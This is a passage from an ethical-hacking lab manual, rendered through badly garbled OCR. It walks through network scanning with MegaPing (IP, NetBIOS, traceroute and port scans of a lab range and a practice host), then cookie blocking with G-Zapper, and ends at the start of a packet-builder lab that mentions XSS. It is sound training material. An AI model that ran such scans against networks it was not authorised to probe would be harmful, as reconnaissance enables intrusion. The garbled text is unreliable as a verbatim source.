‫ &י־‬DNSLidrtosfe
* DNS Lookup Name
Q Fngcr
1S Network Time
gg Ping
C Q A ll S c a n n e rs c a n sca n g g Traceroute
in d iv id u a l c o m p u te rs , a n y Who 11
ra n g e o f I P ad d re sse s, ^ Network R#toufc#t

d o m a in s , a n d se le c te d ty p e <<•>Process Info
o f c o m p u te rs in s id e
Systam Info

d o m a in s
£ IP Scanner
$ NetBIOS Scanner
•'4? Share Scanner
^ Security Scanner
-J? Port Scanner
Jit Host Monitor

*S Lbt Ho>ts

F ig u r e 15.3: M e g a P in g m a in w in d o w s

4. S e le c t a n y o n e o f d ie o p tio n s fro m d ie le f t p a n e o f d ie w in d o w .

S e c u r ity s c a n n e r 5. S e le c t IP s c a n n e r, a n d ty p e in th e IP range i n d i e From a n d To fie ld ; i n

p ro v id e s th e fo llo w in g
t h is la b t h e I P r a n g e is f r o m 1 0 .0 .0 .1 t o 10.0.0.254. C l i c k S ta rt
in fo rm a tio n :
N e t B IO S n a m e s,
C o n fig u ra tio n in fo , o p e n
6. Y o u c a n s e le c t t h e IP range d e p e n d in g o n y o u r n e t w o r k .
T C P a n d U D P p o rts ,
T ra n s p o rts , S h a re s , U s e rs ,
G r o u p s , S e rv ic e s , D r iv e r s ,
L o c a l D r iv e s , S e s s io n s ,
R e m o te T im e o f D a te ,
P r in te r s

C E H Lab M anual Page 237 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

fs r MegaPing (Unregistered) ‫־‬ ° r

File V«‫*׳‬/ Took Help

^ 3‫^>׳‬ v ^ eg
^< ‫״‬DNS
!‫״‬U X .Hosts
List IWU r ^ —
_ r « a P - 1 'S W W
* t DNS Lookup Name
^ Finger
Network Time t I3 Scanner IP Sconncr SKtngj
8a8 Ping
Select
iraccroutc
I | 10 0 0 1 10 0 0 254 | 1 SM 1
^ Whois “ I
Network Resources ► Scam•‫׳׳‬
<§> Process Info
^ System Info
■*iiaui.111
■ £ NetBIOS Scanner
Y* Share Scanner
j & Security Scanncr
^ Port Scanner
^ Host Monitor

F IG U R E 15.4: M e g a P in g I P S c a n n in g

I t w i l l lis t d o w n a ll th e IP a d d re sse s u n d e r d ia t ra n g e w it h th e ir TTL

( T im e t o L iv e ) , S ta tu s (d e a d o r a liv e ) , a n d d ie s ta tis tic s o f th e d e a d

a n d a liv e h o s ts .

MegaPing (Unregistered)
Pie View Tools Help

11 g ft A <>
CD N e t w o r k u t ilit ie s :
i , DN: List Hosts
D N S lis t h o s t, D N S lo o k u p IP5i«nnw
,p, DNS Lookup Name
n a m e , N e tw o r k T im e Q Finger
S y n c h ro n i2 e r, P in g , a Network Time X IP Scanner $ IP Scanner Satnge
T ra c e ro u te , W h o is , a n d i t Ping Setect.
Traceroute
F in g e r.
|R5rg‫»־‬ 10 . 0 0 . 1 10 0 0 254 I Start
HVhols
1
“ 5 Network Resources F S ca re
o— l —
% rocess Info
^ System Info
Status: ZoTDCTCC 25^ accroco33 m 15 8CCS3

A tte s t Name Tme TTL Statj*

□ Show MAC
.=1 10.0.0.1 0 54 Afivc Addresses
NetBIOS Scanner g 1a0.04 1 128 A kvt
y * Share Scanner
g iao.o.6 0 128 A ive
$ Security Sconner HostsStats
£ 1ao.o.7 0 128 Afcve
l. Jj? Port Scanner To!d. 254
£ 1a0.0.10 D e l-
JSi Host Monitor Active 4
j q 10.0.0.100 Dest..
^ 1CL0.0.I0I D « t- Faicd: 250
10.0.0.102 Dest —
£ iclo .o.io j De«t._
j l 10.0.0.1m Dest —
g 1a0.0.105 Dest._ Rcpon

F IG U R E 15.5: M e g a P in g I P S c a n n in g R e p o r t

S T A S K 2 8. NetB IO S S c a n n e r f r o m t h e l e f t p a n e a n d t y p e i n t h e I P r a n g e
S e le c t th e
i n t h e From a n d To f i e l d s . 111 t h i s l a b , t h e IP ra n g e is f r o m 10.0.0.1 t o
NetBIOS 1 0.0.0 .2 54 C l i c k S ta rt
Scanning

C E H Lab M anual Page 238 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

W f/egaPing (Unregistered) T IP I
File View Tools Hdp

rP- A
J* | DNS List Hosts
N c G C S Ssonrcr
,5, DNS Lookup Name
g Finger
‫ ס‬M egaPing can 3 Network Time

scan yo u r e n tire t S P1n9

Traceroute
n e tw o rk and « £ Whols
Network Resource
provide <$> Process Info
in fo rm a tio n such System Info
^ IP Scanncr
as open shared i! \
Share Scanner
resources, open ^ Security Scanner
ports, ^ Port Scanner
Host Monitor
se rvice s/drivers
a c tiv e on th e
co m p u te r, key
re g is try en trie s,
users and groups,
tru s te d dom ains, NetBIOS Scanner

p rin te rs, and F IG U R E 15.6: M e g a P in g N e t B IO S S c a n n in g

more.
9. The N etB IO S s c a n w i l l lis t a ll th e h o s ts w i t h t h e ir N etB IO S nam es and

a d a p te r a d d re sse s
MegaPing (Unregistered)
Me VtfA Tori? Help

JL JL 4S & *“8 88 &

& ‫ ־‬Scan results
can be saved in
JJ, DNSListHosts
j!LDNSLookupNam•
Q Finger
& K«BIT$ Scarrer

HTML or TXT !31NetworkTime ^ Net90$ Scanrer MenBIOS Scarrra

t i p,n9
reports, w h ic h g*3 Traceroute
^ Whole |Rerg5 ] | 10 . 0 . 0 . 1 | 10 0 . 0 .254 Stop
can be used to - O Network Resources NstEtOS Scanner
secure your % Process Info aJatLS‫־‬ ZoroeecQuemg NetBOS Names on ‫י‬Expard
1Names
‫״״‬J ^ System Info
Name STctus
n e tw o rk ■‫־‬fo r ^ IP Scanner 100.0.4 WIN-ULY833KHQ.. A l* «
Expand
Summary
exam ple, by $m ggnn1 » 2 ) NetBIOS Names 3
4jp Share Scanner W gf Adopter Address 00 15-5D 00-07 . . Microsoft ‫״‬
Sots
s h u ttin g dow n Security Scanner A □cmam WORKGROUP

unnecessary
/‫״‬y Port Scanner
iac.0.6 ADMIN• PC Alive
Told. 131
2 ( Host Munitur fr] NetBIOS Nome: 6
Actvc 3

ports, clo sin g W B Adapter Addre« 00-15-50-00-07‫־‬.. M<T0?cfr ‫״‬ =a!od 123

4^ Domain WORKGROUP
shares, etc. 100.0.7 WIN-D39MRSHL.. A lv#
» j | ] NetBIOS Names 3
X f Adapter Address D4-BE-D9-C3-CE.. Report

NetBIOS Scanner

F IG U R E 15.7: M e g a P in g N e t B IO S S c a n n in g R e p o r t

10. R ig h t- c lic k th e I P a d d r e s s . 111 t h i s l a b , t h e s e l e c t e d I P i s 1 0 . 0 . 0 . 4 ; i t w i l l

b e d iffe r e n t in y o u r n e tw o r k .

5 TAs K 3
1 1 . T h e n , r i g h t - c l i c k a n d s e le c t t h e T ra c e ro u te o p tio n .

T ra ce ro u te

C E H Lab M anual Page 239 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

v MegaPing (Unregistered) I I M
File View Tools Hdp

^ DNS List Hosts

NetBICS Scarre‫־‬
‫ם‬ O th e r fe a tu re s in c lu d e ; j , DNS Lookup Name
g Finger
m u ltith re a d e d d e s ig n th a t
3 Network Time $ M *3 0 S Scarner NetBIOS Scanner S9<tngs
a llo w s to p ro c e s s a n y
t®* Pin9 Soeci: Rom:
n u m b e r o f re q u e s ts in a n y
A Traceroute
to o l a t th e sam e tim e , real- Range v | 10 0 0 0 254 Start
4 $ Whois
tim e n e tw o rk c o n n e c tio n s Network Resources NetElOS S eine r
Process Info Satus Carotored ? M addresses m M secs
s ta tu s a n d p ro to c o ls
Names
s ta tis tic s , re a l- tim e p ro c e s s ^ System Info
_______ Nome 3 0 ( jj Dcpand
in fo r m a tio n a n d u sag e,
•‫ ^־‬IP Scanner
B 0 B ■ * b‫ ?׳‬Summary
‫׳‬J ^ NetBIOS Scanner Export To File
re a l- tim e n e tw o rk * D NetBIOS f■
Share Scanner AdapeerA Merge Hosts
in fo rm a tio n , in c lu d in g Security Scanner Hoete Slate
A Comain Open Share
n e tw o r k c o n n e c tio n s , a n d ^ Port Scanner Total: 254
- j j 10.0.0.5
o p e n n e tw o rk file s , syste m g l Host Monitor View Hotfix Detab Active 3
i - J | NetBIOS
tr a y s u p p o rt, a n d m o re S ? Adopter A Apply Hot Fixes Failed251 ‫־‬
^ Comain
Copy selected item
B A 10.0.0.7
Copy selected row
£ NetBIGS ‫ף‬
■3 Adopter A Copy all result;
Save As

Traceroute
Tnccroutcs the selection

F IG U R E 15.8: M e g a P in g T ra c e ro u te

1 2 . I t w i l l o p e n th e T ra c e ro u te w in d o w , a n d w i l l tra c e d ie I P a d d re s s

s e le c t e d .

MegaPing (Unregistered)
Fie Vie■a Tools Help

S. JL 4$ 151*« 88
Jj, DNS List Ho>b
Tracerout*
J!L DNS Lookup Nam•
& T ools | J Finger
i l l Network Time ** aa TracerouteSetthot
d em o nstrate d in
Destrebon:
th is lab are ^ Whois 1050.4 □ Resolve I4an‫־‬s
a va ila b le in -O Network Resources Ztestrawn \Jdrcs5 Jst
Process Info
D:\CEH- System Info
■ ^ IP Scanner □ Select Al
Tools\CEHv8 NetBIOS Scanner Add
M odule 03 *jp Share Scannei
Security Scanner Ddctc
S canning ‫>׳‬y Port Scanner

N e tw o rks jtA Ho»t Monitor

hoo Time Name Dstafc
9 >91 ‫י‬ WIN-ULY8S8KHUIP [1_ Complete.
1 m £ 1 0 10.0.0.4 <»73/1210t44tf
‫ ־‬A ' ADMIN PC [10.0.0.6] Complete.
* 4 1 ‫ו‬ 10.0.0.6 08/23/12 IQ4SJ1
Repoit |

F IG U R E 15.9: M e g a P in g T ra c e ro u te R e p o r t

S TAs K 4 1 3 . S e le c t P o r t S c a n n e r f r o m d ie l e f t p a n e a n d a d d

w w w .c e rtifie d h a c k e r.c o m 111 th e D e s tin a tio n A d d re ss L is t a n d th e n

P ort Scanning
c l i c k t h e S ta rt b u t t o n .

14. A f t e r c lic k in g th e S ta rt b u t t o n i t to g g le s t o S top

1 5 . I t w i l l lis t s t h e p o r t s a s s o c ia t e d w i t h w w w . c e r t i f i e d l 1 a c k e r . c o m w i t h d ie

k e y w o r d , r is k , a n d p o r t n u m b e r .

C E H Lab M anual Page 240 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

MegaPing (Unregistered)
‫ ך‬- ‫ז ״י‬ v ‫ן‬
File View Tools Help

A A £ G J 8s 8s <5 J ' b & r H I J & GO

-jj, DNS List Hosts
,5, DNS Lookup Name
^ Finger
J‫!׳‬
^ AotScamcr
54 Network Time jftjf F01 Sc*1r*‫׳‬
M e g a P in g s e c u rity f t Ping
g g Traceroute PrttowlB TCP an: UCP
sc a n n e r c h e c k s y o u r
^ Whois m m <
‫»־‬V**tv30‫׳‬fl‫׳<»־׳‬n Scan Type A/!h»1»S Pab -11 S100
n e tw o rk fo r p o te n tia l Network Resources Desindo^ A i^nt Ua>
v u ln e ra b ilitie s th a t m ig h t -^ P ick m Info
System Into
u se to a tta c k y o u r n e tw o rk ,
U IP Sc«nn«< □S*t*dAl
a n d s a v e s in fo rm a tio n in ' f f NetBIOS Sc *nnei
s e c u rity re p o rts Share Seanner
4P S«cjntyScanner w»!* |
Jjf
J f) , H05‫ ז‬Monitor
2o r* T>oe Keyword 81
De a ctor R*
=S Scanning—(51 %)
3 Ce2 fc 99 Sccon ds Remain ‫ח‬g
TCP ftp File Transfer [Control] Eksatcd
TCP www-http World V.'1de Web HTTP Elevated
,y 1 UDP tcpmux TCP Port Servkc MultL. Ele.xed
.* 2 JOP compress.. Management Utility L<*m
.y ! UDP compten . CompreiMoo Proem Law
.*5 JOP rje Remote Job Entr>‫׳‬ Low
JOP echo Echo Low
j * UOP ditcntd Discard Law
' ■

F IG U R E 15.10 : M e g a P iiig P o r t S c a n n in g R e p o r t

L a b A n a ly s is

D o c u m e n t a ll d ie I P a d d re s s e s , o p e n p o r t s a n d r u n n i n g a p p lic a t io n s , a n d p r o t o c o ls

y o u d i s c o v e r e d d u r i n g d i e la b .

T o o l/U tility In f o r m a tio n C o lle c t e d / O b je c t iv e s A c h ie v e d

IP S can R ange: 1 0 .0 .0 .1 — 1 0 .0 .0 . 2 5 4

P e r fo r m e d A c tio n s :

■ I P S c a n n in g

■ N e tB IO S S c a n n in g

■ T ra c e ro u te
M e g a P in g
■ P o r t S c a n n in g

R e s u lt:

■ L is t o f A c tiv e H o s t

■ N e tB io s N a m e

■ A d a p te r N a m e

C E H Lab M anual Page 241 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S L A B .

Q u e s t io n s

1. H o w d o e s M e g a P in g d e te c t s e c u r it y v u ln e r a b ilit ie s o n d ie n e t w o r k ?

2. E x a m in e t h e r e p o r t g e n e r a t io n o f M e g a P in g .

In t e r n e t C o n n e c tio n R e q u ir e d

□ Y es 0 N o

P la tfo r m S u p p o rte d

0 C la s s r o o m 0 iL a b s

C E H Lab M anual Page 242 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

L ab

D e te c t, D elete a n d B lock G oogle

C o o k ies U sing G -Z apper
G-Zapper is a utility to block Goog/e cookies, dean Google cookies, a n d help yon stay
anonymous while searching online.

I CON KEY L a b S c e n a r io

V a lu a b le Y o u have le a r n e d in d ie p r e v io u s la b d ia t M e g a P in g s e c u r ity scanner checks

in f o r m a t io n
your n e tw o rk fo r p o t e n t ia l v u ln e r a b ilit ie s th a t m ig h t be used to a tta c k your

Test your n e tw o rk , and saves in fo r m a t io n in s e c u r ity re p o rts . It p r o v id e s d e ta ile d

k n o w le d g e
in fo r m a t io n a b o u t a ll c o m p u t e r s a n d n e tw o rk a p p lia n c e s . I t s c a n s y o u r e n tir e

n e t w o r k a n d p r o v id e s in f o r m a t io n s u c h as o p e n s h a re d re s o u rc e s , o p e n p o rts ,
m . W e b e x e r c is e
s e r v ic e s / d r iv e r s a c tiv e 0 11 t h e c o m p u t e r , k e y r e g i s t r y e n t r i e s , u s e r s a n d g r o u p s ,
o W o r k b o o k r e v ie w
tru s te d d o m a in s , p r in t e r s , e tc . S can r e s u lts can be saved in H T M L o r T X T

re p o r ts , w h ic h c a n b e u s e d t o s e c u re y o u r n e tw o r k .

A s an a d m in is tr a to r , you can o r g a n iz e s a fe ty m e a s u re s by s h u ttin g dow n

u n n e c e s s a ry p o rts , c lo s in g s h a re s , e tc . to b lo c k a tta c k e rs fro m in tr u d in g th e

n e t w o r k . A s a n o th e r a s p e c t o f p r e v e n t io n y o u c a n u s e G - Z a p p e r , w h ic h b lo c k s

G o o g le c o o k ie s , c le a n s G o o g le c o o k ie s , a n d h e lp s y o u s ta y a n o n y m o u s w h ile

s e a r c h in g o n lin e . T h is w a y y o u c a n p r o t e c t y o u r id e n t i t y a n d s e a rc h h is t o r y .

L a b O b je c t iv e s

T h is la b e x p la in h o w G - Z a p p e r a u t o m a t ic a lly d e te c ts and c le a n s th e G o o g le

c o o k ie e a c h t im e y o u u s e y o u r w e b b r o w s e r .

L a b E n v ir o n m e n t

T o c a r r y o u t th e la b , y o u n e e d :

C E H Lab M anual Page 243 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

D:\CEH-Tools\CEHv8 M odule 03 S canning

G - Z a p p e r is lo c a t e d a t

S ’ Tools N e tw o rk s \A n o n ym ize rs\G -Z a p p e r

dem onstrate d in Y o u c a n a ls o d o w n l o a d d i e la t e s t v e r s io n o f G‫־‬Z a p p e r fro m th e lin k
th is lab are lit t p : / / w w w . d u m m y s o ftw a re .c o m /
available in
D:\CEH- I f y o u d e c id e t o d o w n l o a d t h e la te s t v e rs io n , th e n s c re e n s h o ts s h o w n

Tools\CEHv8 i n th e la b m ig h t d i f f e r
M odule 03
In s ta ll G -Z apper in W in d o w s S e r v e r 2 0 1 2 b y f o llo w in g w iz a r d d r iv e n
Scanning
in s t a lla t io n s te p s
N etw orks
A d m in is t r a t iv e p r iv ile g e s t o r u n t o o ls

A c o m p u te r r u n n in g W in d o w s S e rv e r 2012

L a b D u r a t io n

T im e : 1 0 M in u te s

O v e r v ie w o f G - Z a p p e r

G - Z a p p e r h e lp s p r o t e c t y o u r i d e n t i t y a n d s e a r c h h is t o r y . G - Z a p p e r w i l l r e a d d i e

Google co o k ie i n s t a l l e d o n y o u r P C , d is p la y d ie d a te i t w a s in s t a lle d , d e t e r m in e h o w

y o u r searches h a v e
lo n g been tra cke d , and d isp la y y o u r G o o g le s e a rc h e s . G -

Z a p p e r a llo w s you to a u to m a tic a lly de le te o r e n tir e ly b lo c k d ie G o o g le s e a rc h

c o o k ie f r o m f u t u r e in s t a lla t io n .

L a b T a s k s

S t ask 1 1. L a u n c h th e S ta rt m e n u b y h o v e r in g d ie m o u s e c u r s o r o n th e lo w e r - le f t

D e te ct & D elete c o m e r o f t h e d e s k t o p . _____________________________________________________

Google Cookies

! 3 Windows Serve! 2012

* ttcua Stfwr JOtJ ReleaseCmadtte Oatacert*
ftabslanuwy. 1uMM>:

F IG U R E 16.1: W in d o w s S e rv e r 2012 - D e s k to p v ie w

2. C lic k d ie G-Zapper a p p t o o p e n d ie G‫־‬Z apper w in d o w .

C E H Lab M anual Page 244 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Administrator £
S ta rt

Server
Manager
Wruiows 6009* Wjpw-V Ancrym.. G-Zapper
PowerShel Chrome t/dru^e- Surfog
Tutonal

fLm V # 11 □
Computer Control HyperV SOL Sena
Pwl Virtual
M«tww

m G - Z a p p e r xs *J w Q
c o m p a tib le w ith W in d o w s Command M v ii
Prompt l.retox
9 5 ,9 8 , M E , N T , 2 0 0 0 , X P ,
V is ta , W in d o w s 7.
'-x-olglan n $ 51
NetSca'iT...
Pro Demo Standard

Maw r* 11

F IG U R E 162 : W in d o w s S e rv e r 2012 - A p p s

3. The G -Zapper m a in w i n d o w w i l l a p p e a r a s s h o w n i n th e f o l l o w i n g

s c re e n s h o t.

G-Zapper ‫ ־‬TRIAL VERSION

W h a t is G -Zapper

G-Zapper - Protecting y o u Se arch Privacy

Did you know •Google stores a unique identifier in a cookie on your PC , vrfich alo w s them to track the
keywords you search fo r G-Zapper w i autom atically d etect and clean this cookie in your w eb browser.
Ju s t run G-Zapper, m rw nee the w ndow , and en!oy your enhanced search privacy

2 ' I A Google Tracking ID oasts on your PC.

Your G oogle ID (Chrome) 6b4b4d9fe5c60cc1
Google n sta le d the co okie on W ednesday. Septem ber 05.2012 01 54 46 AM
L J G - Z a p p e r h e lp s p ro te c t
y o u r id e n tity a n d s e a rc h Your searches h ave been tracked for 13 hours
h is to ry . G - Z a p p e r w ill re a d
th e G o o g le c o o k ie in s ta lle d «>| No Google searches found n Internet Explorer or Frefox
o n y o u r P C , d is p la y th e
d a te it w a s in s ta lle d ,
How to U se It
d e te rm in e h o w lo n g y o u r
s e a rch e s h a v e b e e n tra c k e d , To delete the G oogle cookie, d c k the D elete Cookie button
a n d d is p la y y o u r G o o g le
se a rch e s
« Your identity w i be obscured from previous searches and G-Zapper w i re g Ja rly d e an future cookies.

T 0 restore the Google search cookie d ick the Restore Cookie button

htto //www dummvsoftwar e. com

D elete Cookie Resto re Cookie T est Google Settings Register

F IG U R E 16.3: G - Z a p p e r m a in w in d o w s

4. T o d e le t e t h e G o o g le s e a r c h c o o k ie s , c l i c k t h e D e le te C o o kie b u tto n ; a

w i n d o w w i l l a p p e a r t h a t g iv e s i n f o r m a t i o n a b o u t t h e d e le t e d c o o k ie

lo c a t io n . C lic k OK

C E H Lab M anual Page 245 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

‫י‬ G-Zapper - TRIAL VERSION ■ ]j l F x ‫י‬

W h at is G-Zapper

G-Zapper ‫ ־‬Pro tectn g your S e arch Privacy

Did you know ■Google stores a unique identifier n a cookie on y o u P C , v*»ch alo w s them 10 track the

■# keywords you search for G-Zapper w i autom atically defect and d e an this co okie in your w eb browser.
_.lm tJun_G 7an nftj the, w ndnw * in i ftninu.unui ^ n h ao cad joauacu_______ _______

G‫־‬Zapper

The Google search cookie was removed and will be re-created with a
C ] A n e w c o o k ie w ill b e
g e n e ra te d u p o n y o u r n e x t
© new ID upon visiting www.google.com

v is it to G o o g le , b re a k in g The cookie was located a t

th e c h a in th a t re la te s y o u r (Firefox) C:\Users\Administrator\Application
se a rch e s. Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite

Howt

OK

T 0 block and delete the G oogle search cookie, click the B lo ck Cookie button
(Gm ail and A dsense w i be u n avaJab le with the cookie blocked)

http //www. dumm vsoftware com

Delete Cookie Block Cookie T e st Google Settings Register

F IG U R E 1 6 .4 : D e le tin g s e a rc h c o o k ie s

5. T o b lo c k th e G o o g le s e a rc h c o o k ie , c lic k d ie B lo c k c o o k ie b u tto n . A

w i n d o w w i l l a p p e a r a s k in g i f y o u w a n t t o m a n u a lly b lo c k th e G o o g le

c o o k ie . C l i c k Yes

G‫־‬Zapper ■TRIAL VERSION '- m

W h a t is G -Zapper

G-Zapper - Pro tectn g y o u Se arch Privacy

‫ ס‬T he tin y tra y Did you know - G oogle stores a unique identifier in a cookie on your P C . w hich alo w s them to track the
keywords you search for. G-Zapper will autom atically d etect and d e an this cookie in y o u w eb browser.
icon runs in th e p____ .L M iijn fi- Z a n rre t m rnnnre the, w nrinw and pjiinu .unu..ftnhanrari sftatnh nrtvara_________ _______
background, Manually Blocking the Google Cookie
ta k e s up very
little space and Gmail and other Google services will be unavailable while th e cookie is
can n o tify you by manually blocked.
If you use these services, we recom m end not blocking the cookie and
sound & a nim ate instead allow G-Zapper to regularly clean th e cookie automatically.
w hen th e Google
Are you sure you wish to manually block the Google cookie?
c o o k ie is blocked.
How

Yes No

T 0 block and delete the Google search cookie, click the Blo ck Cookie bU ton
(Gm ail and A dsense w l be unavaiaW e with the cookie blocked)

http //www dummvsoftware, com

Delete Cookie Block Cookie T est Google Settings Register

F IG U R E 1 6 .5 : B lo c k G o o g le c o o k ie

6. I t w i l l s h o w a m e s s a g e d i a t th e G o o g le c o o k ie h a s b e e n b lo c k e d . T o

v e r if y , c lic k OK

C E H Lab M anual Page 246 E th ic a l H ackin g and Counterm easures Copyright O by EC-Coundl
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

G‫־‬Zapper -TRIAL VERSION

W h a t is G-Zapper

G-Zappef - Protechng your Se arch Privacy

Did you know ■G oogle stores a unique kfentifiet in a cookie on your P C . w hich alo w s them to track the
1 ^ 0 keywords you search for G-Zapper will autom atically d etect and d e a n this cookie n y o u w eb browser.
Ju s t run G-Zapper, mmmize the w rxlo w , and enjoy your enhanced search privacy

G‫־‬Zapper

The Google cookie has been blocked. You may now search
anonymously on google.com. Click the Test Google button to verify.

H ow t OK

Your identity will be obscured from previous searches and G-Zapper w i regularly clean M u re cookies

T0 restore the Google search cookie c lc k the Restore Cookie button

& ‫ ־‬G-Zapper can http //www dum m vsoltware com

also cle an your

Delete Cookie Restore Cookie Test Google Settings Register
Google search
h is to ry in In te rn e t
E xplo re r and F IG U R E 16.6: B lo c k G o o g le c o o k ie (2 )

M ozilla Firefox.
7. T o te s t th e G o o g le c o o k ie t h a t h a s b e e n b lo c k e d , c lic k th e T e s t G oogle
It's fa r to o easy
b u tto n .
fo r som eone using
your PC to g e t a 8. Y o iu d e fa u lt w e b b r o w s e r w ill n o w o p e n t o G o o g le ’s P re fe re n c e s p a g e .
glim p se o f w h a t C lic k OK.
you've been
searching for. AA goog... P - 2 (5 [ 0 ?references ‫יו‬
-
♦You Search Images Maps Play YouTube News Gmal More ‫־‬ Sign in
1

Google Preferences Goflflls Account 5£tt303 Piefeiences Help I About Google

Save your preference* when finished and !*turn to iw r c h Save Preferences

Global Preferences (changoc apply to al Googio sorvtcos)

Your cookies seem fo be disabled.

Setting p referen ces will not w o rk until you enable co o kies in y ou r
browser.
BaHiflafcfllttg

Interface Language Display Googio Tips and messages in: Engiisn

If you do not find your native language in the pulldown above you can
help Google create it through our Google in Your I anfliiage program

Search I anguag* P iefei pages m itten in the*e language(*)

□ Afrikaans b£ English U Indonesian L I Setblan
□ Arabic L.EsperantoU Italian □ Slovak
D Armenian I~ Estonian F I Japanese 0 Slovenian
□ Belarusian C Ftipino □ Koiean G Spanish
U Bulgarian L Finnish U Latvian L I Swahi

F IG U R E 16.7: C o o k ie s d is a b le d m a ssag e

9. T o v i e w th e d e le t e d c o o k ie i n f o r m a t io n , c lic k d ie S e ttin g b u tto n , a n d

c lic k V ie w Log i n t h e c le a n e d c o o k ie s l o g .

C E H Lab M anual Page 247 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

G-Zapper - TRIAL VERSION ‫׳‬- m

W h a t is G -Zapper

G-Zapper Settings

Sounds

f* R a y sound effect w hen a cookie is deleted d efault w av Preview Browse

G oogle Analytics T iack rtg

Q Y o u c a n s im p ly ru n W Blo ck Google Analytics fiom tia ck n g w eb sites that I visit.

G - Z a p p e r, m in im iz e th e
w in d o w , a n d e n jo y y o u r
D eaned Cookies Log
e n h a n c e d s e a rc h p r iv a c y

W Enab le logging of cookies that h ave recently been cleaned. C lear Log V ie w Log

I” S a v e my G oogle ID in the d ean ed cookies log.

OK

Delete Cookie Resto re Cookie T e st Google Settings R egister

F IG U R E 16.8: V ie w in g th e d e le te d lo g s

1 0 . T h e d e le t e d c o o k ie s i n f o r m a t i o n o p e n s i n N o t e p a d .

cookiescleaned - Notepad t ‫ ־־[ם‬x

File Edit Format View Help
(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox
S ' T ools \Profiles\5vcc40ns.default\cookies.sqlite Friday, August 31, 2012
d em o nstrate d in 10:42:13 AM
(Chrome) C:\Users\Administrator\AppData\Local\Google\Chrome\User Data
th is lab are
\Default\Cookies Friday, August 31, 2012 11:04:20 AM
a va ila b le in (Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox
D:\CEH- \Profiles\5vcc40ns.default\cookies.sqlite Friday, August 31, 2012
Tools\CEHv8 11:06:23 AM
(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox
M odule 03 \Profiles\5vcc40ns.default\cookies.sq lite Wednesday, September 05, 2012
S canning 02:52:38 PM|
N e tw o rks

F IG U R E 16.9: D e le te d lo g s R e p o r t

L a b A n a ly s is

D o c u m e n t a ll t h e I P a d d re s s e s , o p e n p o r t s a n d r u n n i n g a p p lic a t io n s , a n d p r o t o c o ls

y o u d i s c o v e r e d d u r i n g d i e la b .

C E H Lab M anual Page 248 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

T o o l/U tility In fo r m a tio n C o lle c t e d / O b je c t iv e s A c h ie v e d

A c tio n P e rfo rm e d :

■ D e t e c t d i e c o o k ie s

■ D e le t e t h e c o o k ie s
G ‫־‬Z a p p e r
■ B l o c k t h e c o o k ie s

R e s u l t : D e le t e d c o o k ie s a re s t o r e d i n

C :\U s e r s \A d m in is tr a to r \ A p p lic a tio n D a ta

P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S L A B .

Q u e s t io n s

1. E x a m i n e h o w G - Z a p p e r a u t o m a t i c a l l y c le a n s G o o g l e c o o k ie s .

2. C h e c k t o s e e i f G - z a p p e i i s b l o c k i n g c o o k i e s o n s ite s o t h e r t h a n G o o g l e .

In t e r n e t C o n n e c tio n R e q u ir e d

0 Y es □ N o

P la tfo r m S u p p o rte d

0 C la s s r o o m □ iL a b s

C E H Lab M anual Page 249 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Lab

S canning th e N etw ork Using th e

C olasoft P ack e t Builder
The Colasoft Packet Builder is a useful toolfor creating custom netirork packets.

I CON KEY L a b S c e n a r io
V a lu a b le
11 1 d i e p r e v i o u s l a b y o u h a v e l e a r n e d l i o w y o u c a n d e t e c t , d e le t e , a n d b l o c k c o o k ie s .
in fo r m a tio n
A tta c k e rs e x p lo it d ie XSS v u ln e r a b ilit y , w h ic h in v o lv e s an a tta c k e r p u s h in g
Test your m a lic io u s J a v a S c r ip t c o d e i n t o a w e b a p p lic a tio n . W h e n a n o d ie r u s e r v is its a p a g e
k n o w le d g e
w i d i d i a t m a lic io u s c o d e i n it , d ie u s e r ’s b r o w s e r w i l l e x e c u te d ie c o d e . T h e b r o w s e r

Q W e b e x e r c is e lia s 110 w a y o f t e l l i n g t h e d i f f e r e n c e b e t w e e n l e g i t i m a t e a n d m a l i c i o u s c o d e . I n j e c t e d
